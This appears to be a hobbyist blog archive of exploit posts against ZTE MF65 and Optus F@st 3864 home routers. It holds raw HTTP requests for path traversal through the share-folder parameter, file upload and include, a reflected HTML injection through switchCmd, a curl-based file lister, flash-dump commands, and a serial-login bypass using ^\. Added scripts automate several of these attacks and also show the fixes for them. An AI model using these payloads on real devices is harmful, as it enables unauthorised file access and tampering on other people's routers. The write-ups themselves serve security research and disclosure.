Posts

Showing posts from June, 2016

///// ZTE MF65 -- local file listing method 3 (LFLM) The Full Package /////

Another super quick one, for an even better listing in the web application, with the ability to change your path via the SD card settings. We use the exploit from last time to gain web-app access to the web folder; this time, though, we have a little bit more work to do, so here we go from the start:

    POST /goform/goform_set_cmd_process HTTP/1.1
    Host: 192.168.0.1

    isTest=false&goformId=HTTPSHARE_AUTH_SET&HTTP_SHARE_STATUS=Enabled&HTTP_SHARE_WR_AUTH=readWrite&HTTP_SHARE_FILE=..%2Fweb%2F

Using the HTTP_SHARE_FILE= parameter we can change which folder the SD card manager displays. You will need to be logged in for this method, so your workflow is: log in, send the request to change the path, log out, then use the HTTP guest button to see the files. Now we navigate to web/js/config/, download the config.js file and change the line SD_BASE_PATH: /mmc2/ to SD_BASE_PAT

///// ZTE MF65 -- local file listing method 2 (LFLM) /////

Another super quick one, for a better listing in the web application:

    POST /goform/goform_set_cmd_process HTTP/1.1
    Host: 192.168.0.1

    isTest=false&goformId=HTTPSHARE_AUTH_SET&HTTP_SHARE_STATUS=Enabled&HTTP_SHARE_WR_AUTH=readWrite&HTTP_SHARE_FILE=..%2Fweb%2F

Using the HTTP_SHARE_FILE= parameter we can change which folder the SD card manager displays. You will need to be logged in for this method, so your workflow is: log in, send the request to change the path, log out, then use the HTTP guest button to see the files. This can be used to include files and to delete, create and rename files/folders. This method requires a login, but other methods work without one. Till next time :) FrankSxx
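The HTTPSHARE_AUTH_SET flow from this post and the "Full Package" post above, scripted with curl, as an added example that is not part of the original posts. It also carries the check the share handler should have applied to HTTP_SHARE_FILE before honouring it. The router address and a cookie jar holding an already-authenticated web UI session are assumptions (the page does not show the login request), so the request function prints what it would send and only sends it when SEND=1.

```shell
#!/bin/sh
# Added example (not from the original posts). Assumptions: ROUTER is the
# MF65's address and COOKIE_JAR holds a session cookie exported after logging
# in through the web UI; neither the login request nor the cookie name is on
# the page.
ROUTER="${ROUTER:-192.168.0.1}"
COOKIE_JAR="${COOKIE_JAR:-cookies.txt}"

# urlencode: percent-encode everything except unreserved characters
# (A-Z a-z 0-9 - . _ ~), so "../web/" becomes "..%2Fweb%2F" as captured above.
urlencode() {
    printf '%s' "$1" | od -An -tx1 -v | tr -s ' \n' '\n' | sed '/^$/d' |
    while read -r hex; do
        case "$hex" in
            2d|2e|5f|7e|3[0-9]|4[1-9a-f]|5[0-9a]|6[1-9a-f]|7[0-9a])
                printf '%b' "\\0$(printf '%o' "0x$hex")" ;;
            *)  printf '%%%s' "$(printf '%s' "$hex" | tr 'a-f' 'A-F')" ;;
        esac
    done
}

# share_set_root: the authenticated POST that moves the guest share's root.
# Prints the body; sends it with the session cookie when SEND=1.
share_set_root() {
    body="isTest=false&goformId=HTTPSHARE_AUTH_SET&HTTP_SHARE_STATUS=Enabled&HTTP_SHARE_WR_AUTH=readWrite&HTTP_SHARE_FILE=$(urlencode "$1")"
    printf '%s\n' "$body"
    if [ "${SEND:-0}" = 1 ]; then
        curl -s -b "$COOKIE_JAR" -d "$body" "http://$ROUTER/goform/goform_set_cmd_process"
    fi
}

# resolve_share_path: lexically resolve a requested share path against ROOT
# ($1), printing the result, or ESCAPE if ".." climbs above ROOT. This is the
# normalisation the handler lacks: it stores "../web/" as given, and the guest
# share listing then walks the web root instead of /mmc2.
resolve_share_path() {
    printf '%s\n' "$2" | awk -v root="$1" -F/ '{
        n = 0
        for (i = 1; i <= NF; i++) {
            if ($i == "" || $i == ".") continue
            if ($i == "..") { if (n == 0) { print "ESCAPE"; exit } n--; continue }
            parts[++n] = $i
        }
        out = root
        for (i = 1; i <= n; i++) out = out "/" parts[i]
        print out
    }'
}

# path_within_root: succeed only if the requested path ($2) stays under ROOT ($1).
path_within_root() {
    [ "$(resolve_share_path "$1" "$2")" != "ESCAPE" ]
}
```

Run share_set_root '../web/' while logged in, log out, then open the guest share, which now lists the web root. path_within_root /mmc2 '../web/' fails, which is the check that would have stopped it; a handler that additionally resolves symlinks before re-checking the prefix closes the remaining gap.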

// Zte MF65 Local/Exec File Include //

  ## File Upload/Exec LFI ##

Hey, a new one: a demonstration of web-server executable includes. Use POST to send off this file; it carries our basic index page, re-uploaded without the service provider's logo. Use Hijack.html to load the new file. It may fail, and it may also report success without actually working, so use it together with the lister bash script to check the /webs folder.

    POST /cgi-bin/web/Hijack.html HTTP/1.1
    Host: Your IP
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Content-Type: multipart/form-data; boundary=---------------------------13738844281409151800268458935
    Content-Length: 10299

    -----------------------------13738844281409151800268458935
    Content-Disposition: form-data; name="path_SD_CARD_time"

    2016-06-12 04:28:43
    -----------------------------13738844281409151800268458935
    Content-Disposition: form-data; name="path_SD_CARD_time_unix"

    1465705724
    ----

MF65 File List/Rename/Delete Bash Scripts

Quick upload: these have (your.local.ip) in them; change it to suit yours. Bash script for file listings:

    #!/bin/sh
    # MF65 HTTP share folder lister. Replace your.local.ip with the router's address.
    HOST="your.local.ip"

    # list_folder PATH PAGE: ask the share handler for one page (10 results) of PATH.
    list_folder() {
        curl "http://$HOST/goform/goform_set_cmd_process?isTest=false&goformId=HTTPSHARE_ENTERFOLD&path_SD_CARD=$1&indexPage=$2"
        echo
    }

    echo "use ^C to exit"
    while true; do
        echo "path"
        read -r PARAM1
        echo "page (please use 1 as default (10 results per page))"
        read -r PARAM2
        echo
        list_folder "$PARAM1" "$PARAM2"
        echo "New page number? or 0 to go back."
        read -r PARAM3
        if [ "$PARAM3" != "0" ]; then
            list_folder "$PARAM1" "$PARAM3"
        fi
    done

///Zte MF65 local file listing/include exploits///

Hey guys, back again with another quickie but goodie. I've been searching for any trace of this router's internal filesystem by every LFI method I could think of, and was lured to the HTTP share page. This is the page used to upload files onto the SD card, and it appears to be locked to the mmc2 path via the requests it makes; the paths are set in the httpshare files (off the top of my head they are in the tmpl/sd path and in the js path). The HTTP page uses a directory check to obtain a listing of the files in that directory (mmc2); by changing the check queries we end up with a few local file listing includes and a few local file includes. We are sending XHR (XMLHttpRequest) requests via your favourite request launcher (nc, curl, Burp, whatever), using:

    POST /goform/goform_set_cmd_process HTTP/1.1
    Host: 192.165.0.1
    User-Agent: your own UA
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gz

ZTE (Telstra) MF65 - Remote file include -

This exploit uses:

    http://Your-R-IP/goform/goform_process?goformId=MODE_SWITCH&switchCmd=

and abuses the loose handling of closing HTML tags. The switchCmd page normally writes the switch command into an unclosed <title> tag and returns either success or fail in the page title, which lets us close the <title> and start a new tag. (What gets included is fetched by the visiting browser, not by the router: this is reflected HTML injection through the switchCmd parameter.) I found <xyz> worked as an arbitrary tag (you could use anything in there), so we have:

    switchCmd=pagenamegoeshere</title><xyz>

and using the img and span tags we get:

    <img border=0 width=300 height=200 src="https://www.google.com.au/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png" alt="some crap goes here" v:shapes="and here as well"><span><p><a href="http://google.com" target="_blank"><span class="index_toplink">this w
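The title injection described above, reproduced offline as an added example that is not from the original post. render_title_raw stands in for the MODE_SWITCH page writing switchCmd into <title> unescaped (the real page is not modelled beyond that one line), html_escape is the fix, and count_tags shows that the injected <img> only becomes an element in the raw rendering. probe_mode_switch sends the same payload to a device whose address is assumed in ROUTER.

```shell
#!/bin/sh
# Added example (not from the original post). Offline model of a page that
# reflects a query parameter into <title> without escaping, next to the fix.

# render_title_raw: stands in for the MODE_SWITCH response; $1 is the
# switchCmd value, written into the title verbatim.
render_title_raw() {
    printf '<html><head><title>%s</title></head><body></body></html>\n' "$1"
}

# html_escape: encode the five characters that can change HTML structure.
# "&" goes first so the entities produced by the later rules are not re-escaped.
html_escape() {
    printf '%s' "$1" | sed -e 's/&/\&amp;/g' -e 's/</\&lt;/g' -e 's/>/\&gt;/g' \
        -e 's/"/\&quot;/g' -e "s/'/\&#39;/g"
}

# render_title_escaped: the corrected rendering; the value can no longer
# close </title> or open a new tag.
render_title_escaped() {
    printf '<html><head><title>%s</title></head><body></body></html>\n' "$(html_escape "$1")"
}

# count_tags DOC NAME: number of start tags <NAME ...> in DOC. Used to check
# whether an injected <xyz> or <img> became a real element.
count_tags() {
    printf '%s' "$1" | grep -o "<$2[ >]" | wc -l | tr -d ' '
}

# probe_mode_switch: send a payload to the endpoint named in the post; curl
# does the URL-encoding. Only meaningful against a real device (ROUTER assumed).
probe_mode_switch() {
    ROUTER="${ROUTER:-192.168.0.1}"
    curl -sG --data goformId=MODE_SWITCH --data-urlencode "switchCmd=$1" \
        "http://$ROUTER/goform/goform_process"
}
```

With PAYLOAD='pagenamegoeshere</title><xyz><img src="http://example.invalid/logo.png">', count_tags "$(render_title_raw "$PAYLOAD")" img prints 1 and the escaped rendering prints 0; the same count_tags check run over the body returned by probe_mode_switch tells you whether a device reflects the value raw.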

Optus f@st 3864: dumping the filesys

Wednesday, 1 June 2016

This is easily accomplished via cat:

    # cat /dev/mtd0 > /tmp/www/mtd.jpg      (or to a file under /mnt/usb1_1)

Retrieve the file via http://localhost/tmp/www/mtd.jpg, or via USB, or even TFTP. The rootFS.jffs2 is stored in mtd0 (this will include the cferam.000 file), the rootFs_update is stored in mtd1, the data is stored in mtd2 and the nvram is stored in mtd3. You can use binwalk to extract the rootfs as long as you have installed jefferson (the jffs2 library, https://github.com/sviehb/jefferson). Now we can turn our focus towards the bin contents and the lib functions. Stay tuned.
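The dump step from this post, wrapped into a script as an added example that is not from the original post: it reads /proc/mtd on the device, copies every partition with cat as above, and records each dump's size and md5 so a truncated copy is noticed before hours go into binwalk. The partition names are the four the post lists; the /proc/mtd sample embedded for offline use is constructed and its sizes are made up.

```shell
#!/bin/sh
# Added example (not from the original post). Dumps every partition listed in
# /proc/mtd and records size and md5 for each. Partition names follow the
# post (rootfs, rootfs_update, data, nvram); the sizes in the constructed
# sample below are made up.

SAMPLE_PROC_MTD='dev:    size   erasesize  name
mtd0: 00400000 00010000 "rootfs"
mtd1: 00400000 00010000 "rootfs_update"
mtd2: 00040000 00010000 "data"
mtd3: 00020000 00010000 "nvram"'

# mtd_list: read /proc/mtd-formatted text on stdin, print "mtdN name" pairs.
mtd_list() {
    sed -n 's/^\(mtd[0-9][0-9]*\): *[0-9a-fA-F]* *[0-9a-fA-F]* *"\(.*\)".*$/\1 \2/p'
}

# mtd_dev_for TEXT NAME: device for a partition name, e.g. nvram -> mtd3.
mtd_dev_for() {
    printf '%s\n' "$1" | mtd_list | awk -v want="$2" '$2 == want { print $1; exit }'
}

# mtd_size_bytes TEXT DEV: expected byte count from the hex size column, so a
# dump can be checked for a short read.
mtd_size_bytes() {
    hex=$(printf '%s\n' "$1" | awk -v dev="$2:" '$1 == dev { print $2; exit }')
    [ -n "$hex" ] || return 1
    printf '%d\n' "0x$hex"
}

# dump_mtd DEV NAME DEST EXPECTED: copy /dev/DEV to DEST/NAME.jpg (the post
# names the dump .jpg so the web server hands it out from /tmp/www), compare
# the size with EXPECTED and write an md5 beside it.
dump_mtd() {
    dev=$1; name=$2; dest=$3; expected=$4
    out="$dest/$name.jpg"
    cat "/dev/$dev" > "$out" || return 1
    actual=$(wc -c < "$out" | tr -d ' ')
    if [ -n "$expected" ] && [ "$actual" -ne "$expected" ]; then
        echo "short dump of $dev: $actual of $expected bytes" >&2
        return 1
    fi
    md5sum "$out" > "$out.md5"
}

# dump_all [DEST]: run on the router; DEST defaults to /tmp/www, /mnt/usb1_1
# is the other location the post uses.
dump_all() {
    dest=${1:-/tmp/www}
    proc=$(cat /proc/mtd)
    printf '%s\n' "$proc" | mtd_list | while read -r dev name; do
        dump_mtd "$dev" "$name" "$dest" "$(mtd_size_bytes "$proc" "$dev")"
    done
}

if [ "${1-}" = "--dump" ]; then
    dump_all "$2"
fi
```

On the host, after fetching the .jpg and .md5 files: md5sum -c rootfs.jpg.md5 confirms the copy, and binwalk -e rootfs.jpg unpacks the jffs2 image once jefferson is installed.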

f@st 3864: serial prompt authentication exploit.

OK guys, this one's a really quick one. I've got a lot to come, but this is urgent :P During my usual digging I was left sitting at the cursor waiting on a login to begin:

    Login: /////////////////////////////////////////////////////////////////////////
    Password:
    Login incorrect. Try again.

Next I thought, just a web null, what's the worst that could happen:

    Login:
    Password:
    Login incorrect. Try again.

Next was just a random amount of unicode characters:

    Login: %^]���^B����؀=y4���^B���^\

and then I learnt that I could simply use ^\ (the stty quit character):

    Login: ^\
    wlmngr/669: potentially unexpected fatal signal .
    smd/340: potentially
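An added example, not from the original post, of the behaviour behind those log lines and the fix for it: the process reading from a serial console receives the signals the tty line discipline generates, so ^\ (SIGQUIT) kills a login prompt that never set those signals to be ignored. prompt_status simulates both variants by having a child shell signal itself, and disable_tty_signal_chars shows the stty-level mitigation for a console device whose path is assumed. How the F@ST's own login handler is built is not visible on this page, so nothing here models it beyond the prompt.

```shell
#!/bin/sh
# Added example (not from the original post). Simulates a login prompt with
# and without the terminal-generated signals ignored. The child sends itself
# SIGQUIT (what ^\ produces under the default stty settings) and SIGINT (^C).

# prompt_status MODE: print the child's exit status, 0 if the prompt
# survived, 131 (128 + SIGQUIT) if the signal killed it. MODE is "hardened"
# or "plain".
prompt_status() {
    ulimit -c 0 2>/dev/null          # do not leave core files behind
    status=0
    if [ "$1" = hardened ]; then
        # Ignore ^\ ^C ^Z before ever printing the prompt, as getty/login do.
        sh -c 'trap "" QUIT INT TSTP; kill -QUIT $$; kill -INT $$; printf "Login: " >/dev/null' || status=$?
    else
        # Default dispositions: the first ^\ terminates the prompt.
        sh -c 'kill -QUIT $$; printf "Login: " >/dev/null' || status=$?
    fi
    echo "$status"
}

# disable_tty_signal_chars DEVICE: mitigation at the line level. With the
# quit/intr/susp characters undefined, ^\ ^C ^Z arrive as ordinary bytes and
# generate no signal at all. DEVICE is the console tty (path assumed).
disable_tty_signal_chars() {
    stty quit undef intr undef susp undef < "$1"
}
```

On a shell where ^\ is live, prompt_status plain prints 131 and prompt_status hardened prints 0. Run disable_tty_signal_chars /dev/ttyS0 (device path assumed) before starting the prompt and the same keystroke becomes input instead of a signal.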